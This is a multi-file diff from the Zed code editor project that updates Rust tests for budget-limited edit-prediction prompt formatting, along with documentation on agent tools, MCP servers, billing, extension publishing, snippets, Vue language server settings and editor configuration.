indoc! {r#"
<|file_sep|>mod.rs
mod header
@@ -4239,11 +4619,12 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
// With tight budget, only order<=1 excerpts included (header + important fn).
assert_eq!(
- format_with_budget(&input, 55),
+ format_with_budget(&input, budget_with_margin(55)).unwrap(),
indoc! {r#"
<|file_sep|>mod.rs
mod header
@@ -4257,6 +4638,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4271,7 +4653,7 @@ mod tests {
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>edit history
--- a/old.rs
@@ -4287,10 +4669,11 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
assert_eq!(
- format_with_budget(&input, 55),
+ format_with_budget(&input, 60).unwrap(),
indoc! {r#"
<|file_sep|>edit history
--- a/new.rs
@@ -4303,6 +4686,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4316,25 +4700,19 @@ mod tests {
vec![make_related_file("related.rs", "helper\n")],
);
- assert_eq!(
- format_with_budget(&input, 30),
- indoc! {r#"
- <|file_sep|>test.rs
- <|fim_prefix|>
- <|fim_middle|>current
- fn <|user_cursor|>main() {}
- <|fim_suffix|>
- <|fim_middle|>updated
- "#}
- );
+ assert!(format_with_budget(&input, 30).is_none())
}
+ #[track_caller]
fn format_seed_coder(input: &ZetaPromptInput) -> String {
format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, 10000)
+ .expect("seed coder prompt formatting should succeed")
}
+ #[track_caller]
fn format_seed_coder_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String {
format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, max_tokens)
+ .expect("seed coder prompt formatting should succeed")
}
#[test]
@@ -4370,6 +4748,34 @@ mod tests {
);
}
+ #[test]
+ fn test_v0317_formats_prompt_with_many_related_files() {
+ let related_files = (0..900)
+ .map(|index| {
+ make_related_file(
+ &format!("related_{index}.rs"),
+ "fn helper() {\n let value = 1;\n}\n",
+ )
+ })
+ .collect();
+
+ let input = make_input(
+ "code",
+ 0..4,
+ 2,
+ vec![make_event("a.rs", "-x\n+y\n")],
+ related_files,
+ );
+
+ let prompt =
+ format_prompt_with_budget_for_format(&input, ZetaFormat::V0317SeedMultiRegions, 4096);
+
+ assert!(prompt.is_some());
+ let prompt = prompt.expect("v0317 should produce a prompt under high related-file count");
+ assert!(prompt.contains("test.rs"));
+ assert!(prompt.contains(CURSOR_MARKER));
+ }
+
#[test]
fn test_seed_coder_no_context() {
let input = make_input("before\nmiddle\nafter", 7..13, 10, vec![], vec![]);
@@ -4419,17 +4825,22 @@ mod tests {
<[fim-middle]>"#}
);
- // With tight budget, context is dropped but cursor section remains
assert_eq!(
- format_seed_coder_with_budget(&input, 30),
+ format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 24),
+ None
+ );
+
+ assert_eq!(
+ format_seed_coder_with_budget(&input, 40),
indoc! {r#"
<[fim-suffix]>
<[fim-prefix]><filename>test.rs
<<<<<<< CURRENT
co<|user_cursor|>de
=======
- <[fim-middle]>"#}
- );
+ <[fim-middle]>"#
+ }
+ )
}
#[test]
@@ -4480,21 +4891,20 @@ mod tests {
<[fim-middle]>"#}
);
- // With tight budget, only high_prio included.
- // Cursor sections cost 25 tokens, so budget 44 leaves 19 for related files.
- // high_prio header (7) + excerpt (3) = 10, fits. low_prio would add 10 more = 20 > 19.
+ // With tight budget under the generic heuristic, context is dropped but the
+ // minimal cursor section still fits.
assert_eq!(
- format_seed_coder_with_budget(&input, 44),
- indoc! {r#"
- <[fim-suffix]>
- <[fim-prefix]><filename>high_prio.rs
- high prio
-
- <filename>test.rs
- <<<<<<< CURRENT
- co<|user_cursor|>de
- =======
- <[fim-middle]>"#}
+ format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 44),
+ Some(
+ indoc! {r#"
+ <[fim-suffix]>
+ <[fim-prefix]><filename>test.rs
+ <<<<<<< CURRENT
+ co<|user_cursor|>de
+ =======
+ <[fim-middle]>"#}
+ .to_string()
+ )
);
}
@@ -4683,6 +5093,87 @@ mod tests {
);
}
+ #[test]
+ fn test_max_event_count() {
+ fn make_numbered_event(index: usize) -> Event {
+ return make_event(
+ &format!("event-{index}.rs"),
+ &format!("-old-{index}\n+new-{index}\n"),
+ );
+ }
+ let input = make_input(
+ "x",
+ 0..1,
+ 0,
+ (0..3).map(make_numbered_event).collect(),
+ vec![],
+ );
+
+ let edit_history_section = format_edit_history_within_budget(
+ &input.events,
+ "<|file_sep|>",
+ "edit history",
+ usize::MAX,
+ 5,
+ );
+
+ assert_eq!(
+ &edit_history_section,
+ indoc!(
+ "
+ <|file_sep|>edit history
+ --- a/event-0.rs
+ +++ b/event-0.rs
+ -old-0
+ +new-0
+ --- a/event-1.rs
+ +++ b/event-1.rs
+ -old-1
+ +new-1
+ --- a/event-2.rs
+ +++ b/event-2.rs
+ -old-2
+ +new-2
+ "
+ )
+ );
+
+ let edit_history_section = format_edit_history_within_budget(
+ &input.events,
+ "<|file_sep|>",
+ "edit history",
+ usize::MAX,
+ 2,
+ );
+
+ assert_eq!(
+ &edit_history_section,
+ indoc!(
+ "
+ <|file_sep|>edit history
+ --- a/event-1.rs
+ +++ b/event-1.rs
+ -old-1
+ +new-1
+ --- a/event-2.rs
+ +++ b/event-2.rs
+ -old-2
+ +new-2
+ "
+ )
+ );
+
+ let edit_history_section = format_edit_history_within_budget(
+ &input.events,
+ "<|file_sep|>",
+ "edit history",
+ usize::MAX,
+ 0,
+ );
+
+ assert_eq!(&edit_history_section, "");
+ }
+
#[test]
fn test_clean_zeta1_model_output_basic() {
let output = indoc! {"
@@ -126,6 +126,59 @@ Images are hosted externally. Reference format:
- With anchors: `[Custom Models](./llm-providers.md#anthropic-custom-models)`
- Parent directory: `[Telemetry](../telemetry.md)`
+## Voice and Tone
+
+### Core Principles
+
+- **Practical over promotional**: Focus on what users can do, not on selling Zed. Avoid marketing language like "powerful," "revolutionary," or "best-in-class."
+- **Honest about limitations**: When Zed lacks a feature or doesn't match another tool's depth, say so directly. Pair limitations with workarounds or alternative workflows.
+- **Direct and concise**: Use short sentences. Get to the point. Developers are scanning, not reading novels.
+- **Second person**: Address the reader as "you." Avoid "the user" or "one."
+- **Present tense**: "Zed opens the file" not "Zed will open the file."
+
+### What to Avoid
+
+- Superlatives without substance ("incredibly fast," "seamlessly integrated")
+- Hedging language ("simply," "just," "easily")—if something is simple, the instructions will show it
+- Apologetic tone for missing features—state the limitation and move on
+- Comparisons that disparage other tools—be factual, not competitive
+- Lots of use of em or en dashes.
+
+## Examples of Good Copy
+
+### Good: Direct and actionable
+
+```
+To format on save, open the Settings Editor (`Cmd+,`) and search for `format_on_save`. Set it to `on`.
+
+Or add this to your settings.json:
+{
+ "format_on_save": "on"
+}
+```
+
+### Bad: Wordy and promotional
+
+```
+Zed provides a powerful and seamless formatting experience. Simply navigate to the settings and you'll find the format_on_save option which enables Zed's incredible auto-formatting capabilities.
+```
+
+### Good: Honest about limitations
+
+```
+Zed doesn't index your project like IntelliJ does. You open a folder and start working immediately—no waiting. The trade-off: cross-project analysis relies on language servers, which may not go as deep.
+
+**How to adapt:**
+- Use `Cmd+Shift+F` for project-wide text search
+- Use `Cmd+O` for symbol search (powered by your language server)
+```
+
+### Bad: Defensive or dismissive
+
+```
+While some users might miss indexing, Zed's approach is actually better because it's faster.
+```
+
## Scope
### In-Scope Documentation
@@ -204,13 +257,14 @@ Inherit all conventions from `docs/.rules`. Key points:
### Terminology
-| Use | Instead of |
-| --------------- | -------------------------------------- |
-| folder | directory |
-| project | workspace |
-| Settings Editor | settings UI |
-| command palette | command bar |
-| panel | sidebar (be specific: "Project Panel") |
+| Use | Instead of |
+| --------------- | --------------------------------------------------------------------- |
+| folder | directory |
+| project | workspace |
+| Settings Editor | settings UI |
+| command palette | command bar |
+| panel | tool window, sidebar (be specific: "Project Panel," "Terminal Panel") |
+| language server | LSP (spell out first use, then LSP is fine) |
## Zed-Specific Conventions
@@ -161,6 +161,7 @@
- [Debugger Extensions](./extensions/debugger-extensions.md)
- [Theme Extensions](./extensions/themes.md)
- [Icon Theme Extensions](./extensions/icon-themes.md)
+- [Snippets Extensions](./extensions/snippets.md)
- [Slash Command Extensions](./extensions/slash-commands.md)
- [Agent Server Extensions](./extensions/agent-servers.md)
- [MCP Server Extensions](./extensions/mcp-extensions.md)
@@ -182,6 +183,7 @@
# Account & Privacy
- [Authenticate](./authentication.md)
+- [Roles](./roles.md)
- [Privacy and Security](./ai/privacy-and-security.md)
- [Worktree Trust](./worktree-trust.md)
- [AI Improvement](./ai/ai-improvement.md)
@@ -9,6 +9,8 @@ Zed supports many external agents, including CLI-based ones, through the [Agent
Zed supports [Gemini CLI](https://github.com/google-gemini/gemini-cli) (the reference ACP implementation), [Claude Agent](https://platform.claude.com/docs/en/agent-sdk/overview), [Codex](https://developers.openai.com/codex), [GitHub Copilot](https://github.com/github/copilot-language-server-release), and [additional agents](#add-more-agents) you can configure.
+For Zed's built-in agent and the full list of tools it can use natively, see [Agent Tools](./tools.md).
+
> Note that Zed's interaction with external agents is strictly UI-based; the billing, legal, and terms arrangement is directly between you and the agent provider.
> Zed does not charge for use of external agents, and our [zero-data retention agreements/privacy guarantees](./ai-improvement.md) are **_only_** applicable for Zed's hosted models.
@@ -56,6 +56,9 @@ You can connect them by adding their commands directly to your settings file ([h
"remote-mcp-server": {
"url": "custom",
"headers": { "Authorization": "Bearer <token>" }
+ },
+ "remote-mcp-server-with-oauth": {
+ "url": "https://mcp.example.com/mcp"
}
}
}
@@ -64,6 +67,8 @@ You can connect them by adding their commands directly to your settings file ([h
Alternatively, you can also add a custom server by accessing the Agent Panel's Settings view (also accessible via the `agent: open settings` action).
From there, you can add it through the modal that appears when you click the "Add Custom Server" button.
+> Note: When a remote MCP server has no configured `"Authorization"` header, Zed will prompt you to authenticate yourself against the MCP server using the standard MCP OAuth flow.
+
## Using MCP Servers
### Configuration Check
@@ -83,9 +83,9 @@ A context window is the maximum span of text and code an LLM can consider at onc
| Model | Provider | Zed-Hosted Context Window |
| ----------------- | --------- | ------------------------- |
| Claude Opus 4.5 | Anthropic | 200k |
-| Claude Opus 4.6 | Anthropic | 200k |
+| Claude Opus 4.6 | Anthropic | 1M |
| Claude Sonnet 4.5 | Anthropic | 200k |
-| Claude Sonnet 4.6 | Anthropic | 200k |
+| Claude Sonnet 4.6 | Anthropic | 1M |
| Claude Haiku 4.5 | Anthropic | 200k |
| GPT-5.2 | OpenAI | 400k |
| GPT-5.2 Codex | OpenAI | 400k |
@@ -94,7 +94,7 @@ A context window is the maximum span of text and code an LLM can consider at onc
| Gemini 3.1 Pro | Google | 200k |
| Gemini 3 Flash | Google | 200k |
-> Context window limits for hosted Sonnet 4.5/4.6 and Gemini 3.1 Pro/3 Pro/Flash may increase in future releases.
+> Context window limits for hosted Gemini 3.1 Pro/3 Pro/Flash may increase in future releases.
Each Agent thread and text thread in Zed maintains its own context window.
The more prompts, attached files, and responses included in a session, the larger the context window grows.
@@ -7,9 +7,9 @@ description: Understand Zed's AI plans, token-based usage metering, spend limits
## Available Plans {#plans}
-For costs and more information on pricing, visit [Zed’s pricing page](https://zed.dev/pricing).
+For costs and more information on pricing, visit [Zed's pricing page](https://zed.dev/pricing).
-Zed works without AI features or a subscription. No [authentication](../authentication.md) required for the editor itself.
+Zed works without AI features or a subscription. No [authentication](../authentication.md) is required for the editor itself.
## Usage {#usage}
@@ -17,6 +17,8 @@ Usage of Zed's hosted models is measured on a token basis, converted to dollars
Zed Pro comes with $5 of monthly dollar credit. A trial of Zed Pro includes $20 of credit, usable for 14 days. Monthly included credit resets on your monthly billing date.
+The [Zed Student plan](https://zed.dev/education) includes $10/month in token credits. The Student plan is available free for one year to verified university students.
+
To view your current usage, you can visit your account at [dashboard.zed.dev/account](https://dashboard.zed.dev/account). Information from our metering and billing provider, Orb, is embedded on that page.
## Spend Limits {#usage-spend-limits}
@@ -25,7 +27,9 @@ At the top of [the Account page](https://dashboard.zed.dev/account), you'll find
The default value for all Pro users is $10, for a total monthly spend with Zed of $20 ($10 for your Pro subscription, $10 in incremental token spend). This can be set to $0 to limit your spend with Zed to exactly $10/month. If you adjust this limit _higher_ than $10 and consume more than $10 of incremental token spend, you'll be billed via [threshold billing](./billing.md#threshold-billing).
-Once the spend limit is hit, we’ll stop any further usage until your token spend limit resets.
+Once the spend limit is hit, we'll stop any further usage until your token spend limit resets.
+
+> **Note:** Spend limits are a Zed Pro feature. Student plan users do not currently have the ability to configure spend limits; usage is capped at the $10/month included credit.
## Business Usage {#business-usage}
@@ -19,10 +19,14 @@ Gets errors and warnings for either a specific file or the entire project, usefu
When a path is provided, shows all diagnostics for that specific file.
When no path is provided, shows a summary of error and warning counts for all files in the project.
+**Example:** After editing `src/parser.rs`, call `diagnostics` with that path to check for type errors immediately. After a larger refactor touching many files, call it without a path to see a project-wide count of errors before deciding what to fix next.
+
### `fetch`
Fetches a URL and returns the content as Markdown. Useful for providing docs as context.
+**Example:** Fetching a library's changelog page to check whether a breaking API change was introduced in a recent version before writing integration code.
+
### `find_path`
Quickly finds files by matching glob patterns (like "\*_/_.js"), returning matching file paths alphabetically.
@@ -31,6 +35,8 @@ Quickly finds files by matching glob patterns (like "\*_/_.js"), returning match
Searches file contents across the project using regular expressions, preferred for finding symbols in code without knowing exact file paths.
+**Example:** To find every call site of a function before renaming it, search for `parse_config\(` — the regex matches the function name followed by an opening parenthesis, filtering out comments or variable names that happen to contain the string.
+
### `list_directory`
Lists files and directories in a given path, providing an overview of filesystem contents.
@@ -55,6 +61,8 @@ Allows the Agent to work through problems, brainstorm ideas, or plan without exe
Searches the web for information, providing results with snippets and links from relevant web pages, useful for accessing real-time information.
+**Example:** Looking up whether a known bug in a dependency has been patched in a recent release, or finding the current API signature for a third-party library when the local docs are out of date.
+
## Edit Tools
### `copy_path`
@@ -73,6 +81,8 @@ Deletes a file or directory (including contents recursively) at the specified pa
Edits files by replacing specific text with new content.
+**Example:** Updating a function signature — the agent identifies the exact lines to replace and provides the updated version, leaving the surrounding code untouched. For widespread renames, it pairs this with `grep` to find every occurrence first.
+
### `move_path`
Moves or renames a file or directory in the project, performing a rename if only the filename differs.
@@ -89,8 +99,12 @@ Saves files that have unsaved changes. Used when files need to be saved before f
Executes shell commands and returns the combined output, creating a new shell process for each invocation.
+**Example:** After editing a Rust file, run `cargo test --package my_crate 2>&1 | tail -30` to confirm the changes don't break existing tests. Or run `git diff --stat` to review which files have been modified before wrapping up a task.
+
## Other Tools
### `spawn_agent`
-Spawns a subagent with its own context window to perform a delegated task. Each subagent has access to the same tools as the parent agent.
+Spawns a subagent with its own context window to perform a delegated task. Useful for running parallel investigations, completing self-contained tasks, or performing research where only the outcome matters. Each subagent has access to the same tools as the parent agent.
+
+**Example:** While refactoring the authentication module, spawn a subagent to investigate how session tokens are validated elsewhere in the codebase. The parent agent continues its work and reviews the subagent's findings when it completes — keeping both context windows focused on a single task.
@@ -15,11 +15,13 @@ Here's how to make Zed feel like home:
1. **Pick a theme**: Press {#kb theme_selector::Toggle} to open the Theme Selector. Arrow through the list to preview themes in real time, and press Enter to apply.
-2. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes.
+2. **Toggle light/dark mode quickly**: Press {#kb theme::ToggleMode}. If you currently use a static `"theme": "..."` value, the first toggle converts it to dynamic mode settings with default themes.
-3. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font.
+3. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes.
-4. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes.
+4. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font.
+
+5. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes.
That's it. You now have a personalized Zed setup.
@@ -2,7 +2,7 @@
This is for moderate-to-large features — new UI, behavior changes, or work that cuts across multiple parts of Zed. Small keybindings or settings tweaks don't need all of this.
-> **Before you start:** If you're an external contributor, make sure the feature is something the team wants before investing significant effort. That said, coming prepared with background research makes it much easier for the team to understand and approve the proposal. Read the [Contributing guide](../../../CONTRIBUTING.md#sending-changes) — if there isn't already a GitHub issue with staff confirmation, start with a GitHub Discussion or a Discord message rather than a PR.
+> **Before you start:** If you're an external contributor, make sure the feature is something the team wants before investing significant effort. Please read the [Contributing Guide](../../../CONTRIBUTING.md) and our [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422) — if there isn't already a GitHub issue with clear staff confirmation, start with a GitHub Discussion. Feature request PRs that skip this process have a _very_ low merge rate. Taking the time to follow our process significantly increases the chances your idea gets picked up and built.
## 1. Why does this matter?
@@ -18,16 +18,20 @@ Write a short, concrete feature statement, then back it up with the context gath
Here's an example format, though adapt it to whatever your feature needs:
-> **Feature:** Inline Git Blame
-> **Purpose:** Show the last commit author and message for each line directly after the editor text, so developers can understand code history without opening the git blame.
-> **Background:**
-> This is standard across all major code editors
-> \[screenshot of VSCode]
-> \[screenshot of Intellij]
-> \[screenshot of Neovim]
-> and has 146 thumbs up on the [github issue](https://github.com).
-> **Decisions:**
-> We have to decide whether to use the git CLI or a git library. Zed uses a git library but its blame implementation is too slow for a code editor, so we should use the CLI's porcelain interface.
+**Feature:** Inline Git Blame
+
+**Purpose:** Show the last commit author and message for each line directly after the editor text, so developers can understand code history without opening the git blame.
+
+**Background:**
+This is standard across all major code editors:
+
+- \[screenshot of VSCode]
+- \[screenshot of Intellij]
+- \[screenshot of Neovim]
+- and has 146 thumbs up on this [github issue](https://github.com).
+
+**Decisions:**
+We have to decide whether to use the git CLI or a git library. Zed uses a git library but its blame implementation is too slow for a code editor, so we should use the CLI's porcelain interface.
## 3. What else does this affect?
@@ -89,7 +89,7 @@ Before making any UI changes, generate baseline images from a known-good state:
```sh
git checkout origin/main
-UPDATE_BASELINE=1 cargo run -p zed --bin visual_test_runner --features visual-tests
+UPDATE_BASELINE=1 cargo run -p zed --bin zed_visual_test_runner --features visual-tests
git checkout -
```
@@ -118,7 +118,8 @@ xcrun: error: unable to find utility "metal", not a developer tool or in PATH
Try `sudo xcode-select --switch /Applications/Xcode.app/Contents/Developer`
-If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain`
+If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain`.
+If that command fails, run `xcodebuild -runFirstLaunch` and try downloading the toolchain again.
### Cargo errors claiming that a dependency is using unstable features
@@ -14,6 +14,7 @@ Zed lets you add new functionality using user-defined extensions.
- [Developing Debugger Extensions](./extensions/debugger-extensions.md)
- [Developing Themes](./extensions/themes.md)
- [Developing Icon Themes](./extensions/icon-themes.md)
+ - [Developing Snippets](./extensions/snippets.md)
- [Developing Slash Commands](./extensions/slash-commands.md)
- [Developing Agent Servers](./extensions/agent-servers.md)
- [Developing MCP Servers](./extensions/mcp-extensions.md)
@@ -5,7 +5,7 @@ description: "Create Zed extensions: languages, themes, debuggers, slash command
# Developing Extensions {#developing-extensions}
-Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, slash commands, and MCP servers.
+Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, snippets, slash commands, and MCP servers.
## Extension Features {#extension-features}
@@ -15,6 +15,7 @@ Extensions can provide:
- [Debuggers](./debugger-extensions.md)
- [Themes](./themes.md)
- [Icon Themes](./icon-themes.md)
+- [Snippets](./snippets.md)
- [Slash Commands](./slash-commands.md)
- [MCP Servers](./mcp-extensions.md)
@@ -47,8 +48,6 @@ description = "Example extension"
repository = "https://github.com/your-name/my-zed-extension"
```
-> **Note:** If you are working on a theme extension with the intent to publish it later, suffix your theme extension ID with `-theme`. Otherwise, this may be raised during [extension publishing](#publishing-your-extension).
-
In addition to this, there are several other optional files and directories that can be used to add functionality to a Zed extension. An example directory structure of an extension that provides all capabilities is as follows:
```
@@ -63,6 +62,9 @@ my-extension/
highlights.scm
themes/
my-theme.json
+ snippets/
+ snippets.json
+ rust.json
```
## WebAssembly
@@ -140,7 +142,24 @@ Your license file should be at the root of your extension repository. Any filena
> This license requirement applies only to your extension code itself (the code that gets compiled into the extension binary).
> It does not apply to any tools your extension may download or interact with, such as language servers or other external dependencies.
-> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects—only the extension code needs to be one of the aforementioned accepted licenses.
+> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects — only the extension code needs to be one of the aforementioned accepted licenses.
+
+## Extension Publishing Prerequisites
+
+Before publishing your extension, make sure that you have chosen a unique extension ID for your extension in the [extension manifest](#directory-structure-of-a-zed-extension).
+This will be the primary identifier for your extension and cannot be changed after your extension has been published.
+Also, ensure that you have filled out all the required fields in the manifest.
+
+Furthermore, please make sure that your extension fulfills the following preconditions before you move on to publishing your extension:
+
+- Extension IDs and names must not contain the words `zed`, `Zed` or `extension`, since they are all Zed extensions.
+- Your extension ID should provide some information on what your extension tries to accomplish. E.g. for themes, it should be suffixed with `-theme`, snippet extensions should be suffixed with `-snippets` and so on. An exception to that rule are extension that provide support for languages or popular tooling that people would expect to find under that ID. You can take a look at the list of [existing extensions](https://github.com/zed-industries/extensions/blob/main/extensions.toml) to get a grasp on how this usually is enforced.
+- Extensions should provide something that is not yet available in the marketplace as opposed to fixing something that could be resolved within an existing extension. For example, if you find that an existing extension's support for a language server is not functioning properly, first try contributing a fix to the existing extension as opposed to submitting a new extension immediately.
+ - If you receive no response or reaction within the upstream repository within a reasonable amount of time, feel free to submit a pull request that aims to fix said issue. Please ensure that you provide your previous efforts within the pull request to the extensions repository for adding your extension. Zed maintainers will then decide on how to proceed on a case by case basis.
+- Extensions that intend to provide a language, debugger or MCP server must not ship the language server as part of the extension. Instead, the extension should either download the language server or check for the availability of the language server in the users environment using the APIs as provided by the [Zed Rust Extension API](https://docs.rs/zed_extension_api/latest/zed_extension_api/).
+- Themes and icon themes should not be published as part of extensions that provide other features, e.g. language support. Instead, they should be published as a distinct extension. This also applies to theme and icon themes living in the same repository.
+
+Note that non-compliance will be raised during the publishing process by reviewers and delay the release of your extension.
## Publishing your extension
@@ -148,13 +167,15 @@ To publish an extension, open a PR to [the `zed-industries/extensions` repo](htt
In your PR, do the following:
-1. Add your extension as a Git submodule within the `extensions/` directory
+1. Add your extension as a Git submodule within the `extensions/` directory under the `extensions/{extension-id}` path
```sh
-git submodule add https://github.com/your-username/foobar-zed.git extensions/foobar
-git add extensions/foobar
+git submodule add https://github.com/your-username/foobar-zed.git extensions/my-extension
+git add extensions/my-extension
```
+> **Note:** Your extension must live under te
+
> All extension submodules must use HTTPS URLs and not SSH URLS (`git@github.com`).
2. Add a new entry to the top-level `extensions.toml` file containing your extension:
@@ -165,14 +186,21 @@ submodule = "extensions/my-extension"
version = "0.0.1"
```
-> If your extension is in a subdirectory within the submodule you can use the `path` field to point to where the extension resides.
+If your extension is in a subdirectory within the submodule, you can use the `path` field to point to where the extension resides:
+
+```toml
+[my-extension]
+submodule = "extensions-my-extension"
+path = "packages/zed"
+version = "0.0.1"
+```
+
+> Note that the [required extension license](#extension-license-requirements) must reside at the specified path, a license at the root of the repository will not work. However, you are free to symlink an existing license within the repository or choose an alternative license from the list of accepted licenses for the extension code.
3. Run `pnpm sort-extensions` to ensure `extensions.toml` and `.gitmodules` are sorted
Once your PR is merged, the extension will be packaged and published to the Zed extension registry.
-> Extension IDs and names should not contain `zed` or `Zed`, since they are all Zed extensions.
-
## Updating an extension
To update an extension, open a PR to [the `zed-industries/extensions` repo](https://github.com/zed-industries/extensions).
@@ -52,7 +52,7 @@ TBD: Document `language_name/config.toml` keys
## Grammar
-Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers#writing-the-grammar). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this:
+Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers/3-writing-the-grammar.html). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this:
```toml
[grammars.gleam]
@@ -0,0 +1,27 @@
+---
+title: Snippets
+description: "Snippets for Zed extensions."
+---
+
+# Snippets
+
+Extensions may provide snippets for one or more languages.
+
+Each file containing snippets can be specified in the `snippets` field of the `extensions.toml` file.
+
+The referenced path must be relative to the `extension.toml`.
+
+## Defining Snippets
+
+A given extension may provide one or more snippets. Each snippet must be registered in the `extension.toml`.
+
+Zed matches snippet files based on the lowercase name of the language (e.g. `rust.json` for Rust).
+You can use `snippets.json` as a file name to define snippets that will be available regardless of the current buffer language.
+
+For example, here is an extension that provides snippets for Rust and TypeScript:
+
+```toml
+snippets = ["./snippets/rust.json", "./snippets/typescript.json"]
+```
+
+For more information on how to create snippets, see the [Snippets documentation](../snippets.md).
@@ -89,7 +89,7 @@ Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages
"languages": {
"Python": {
"language_servers": [
- // Disable basedpyright and enable ty, and include all
+ // Enable ty, disable basedpyright, and enable all
// other registered language servers (ruff, pylsp, pyright).
"ty",
"!basedpyright",
@@ -8,7 +8,59 @@ description: "Configure Vue language support in Zed, including language servers,
Vue support is available through the [Vue extension](https://github.com/zed-extensions/vue).
- Tree-sitter: [tree-sitter-grammars/tree-sitter-vue](https://github.com/tree-sitter-grammars/tree-sitter-vue)
-- Language Server: [vuejs/language-tools/](https://github.com/vuejs/language-tools/)
+- Language Server: [vuejs/language-tools](https://github.com/vuejs/language-tools)
+
+## Initialization Options
+
+### Specifying location of TypeScript SDK
+
+By default, this extension assumes that you are working in a project with a `node_modules` directory, and searches for
+the TypeScript SDK inside that directory.
+
+This may not always be true; for example, when working in a project that uses Yarn PnP, there is no `node_modules`. For
+editor support, the [documented](https://yarnpkg.com/getting-started/editor-sdks) approach is to run something like
+`yarn dlx @yarnpkg/sdks`. In that case, you can provide the following initialization options in your Zed settings:
+
+```json
+{
+ "lsp": {
+ "vue": {
+ "initialization_options": {
+ "typescript": {
+ "tsdk": ".yarn/sdks/typescript/lib"
+ }
+ }
+ }
+ }
+}
+```
+
+## Settings Options
+
+`lsp.vue.settings` is passed through to the Vue language server (Volar / [`vuejs/language-tools`](https://github.com/vuejs/language-tools)). The following settings are enabled by default:
+
+```json
+{
+ "lsp": {
+ "vue": {
+ "settings": {
+ // Display inlay hints for the `$event` parameter in inline event handlers.
+ "vue.inlayHints.inlineHandlerLeading": true,
+ // Display hints when required component props are missing in templates.
+ "vue.inlayHints.missingProps": true,
+ // Display inlay hints for patterns that wrap component options.
+ "vue.inlayHints.optionsWrapper": true,
+ // Display inlay hints related to `v-bind` shorthand (`:`).
+ "vue.inlayHints.vBindShorthand": true
+ }
+ }
+ }
+}
+```
+
+You can find the upstream settings configuration schema [`here`](https://github.com/vuejs/language-tools/blob/ee5041d27940cf6f9a5150635d3b13140a9dff54/extensions/vscode/package.json#L252).
+
+> Note: Some settings (e.g. `vue.editor.focusMode`) may not take effect.
## Using the Tailwind CSS Language Server with Vue
@@ -1908,6 +1908,14 @@ WARNING: `{buffer_path}` should not be used to direct your formatter to read fro
Here `rust-analyzer` will be used first to format the code, followed by a call of sed.
If any of the formatters fails, the subsequent ones will still be executed.
+6. To disable the formatter, use `"none"`. This setting disables the configured formatter, but any actions in `code_actions_on_format` will still be executed:
+
+```json [settings]
+{
+ "formatter": "none"
+}
+```
+
## Auto close
- Description: Whether to automatically add matching closing characters when typing opening parenthesis, bracket, brace, single or double quote characters.
@@ -4619,7 +4627,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
"show_user_picture": true,
"show_user_menu": true,
"show_sign_in": true,
- "show_menus": false
+ "show_menus": false,
+ "button_layout": "platform_default"
}
}
```
@@ -4634,6 +4643,7 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
- `show_user_menu`: Whether to show the user menu button in the titlebar (the one that displays your avatar by default and contains options like Settings, Keymap, Themes, etc.)
- `show_sign_in`: Whether to show the sign in button in the titlebar
- `show_menus`: Whether to show the menus in the titlebar
+- `button_layout`: The layout of window control buttons in the title bar (Linux only). Can be set to `"platform_default"` to follow the system setting, `"standard"` to use Zed's built-in layout, or a custom format like `"close:minimize,maximize"`
## Vim
@@ -4695,7 +4705,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
"bold_folder_labels": false,
"drag_and_drop": true,
"scrollbar": {
- "show": null
+ "show": null,
+ "horizontal_scroll": true
},
"sticky_scroll": true,
"show_diagnostics": "all",
@@ -4941,9 +4952,9 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
}
```
-### Scrollbar: Show
+### Scrollbar
-- Description: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details.
+- Description: Scrollbar-related settings for the project panel.
- Setting: `scrollbar`
- Default:
@@ -4951,7 +4962,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
{
